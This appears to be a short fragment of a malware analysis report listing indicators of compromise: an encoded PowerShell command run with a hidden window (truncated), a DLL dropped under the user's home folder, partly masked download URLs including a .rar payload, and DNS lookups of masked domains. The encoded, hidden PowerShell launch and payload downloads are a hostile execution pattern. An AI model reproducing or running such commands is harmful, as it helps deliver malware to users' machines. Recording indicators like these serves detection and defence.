Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAFQALQBpAFQAZQBNACAAIAAoACcAdgAnACsAJwBhACcAKwAnAFIASQBBAEIATABFADoAdwBBACcAKwAnAFUAZABFAHEAJwApACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADAAfQ...
- %HOMEPATH%\n9s0f09\e2xz9na\pfriugif.dll
- %HOMEPATH%\n9s0f09\e2xz9na\pfriugif.dll
- http://gr###sindia.com/ve5estsq7
- http://www.gr###sindia.com/ve5estsq7
- http://ar##wbo.com/bwy4yoolw.rar
- DNS ASK m2.####onlinefx31.com
- DNS ASK gr###sindia.com
- DNS ASK ar##wbo.com
- DNS ASK ma##.#####fujitsuklimaservisi.com
- DNS ASK ma###oo3i.bh
- DNS ASK cr##.##tosaxplayer.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAFQALQBpAFQAZQBNACAAIAAoACcAdgAnACsAJwBhACcAKwAnAFIASQBBAEIATABFADoAdwBBACcAKwAnAFUAZABFAHEAJwApACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADAAfQ...' (with hidden window)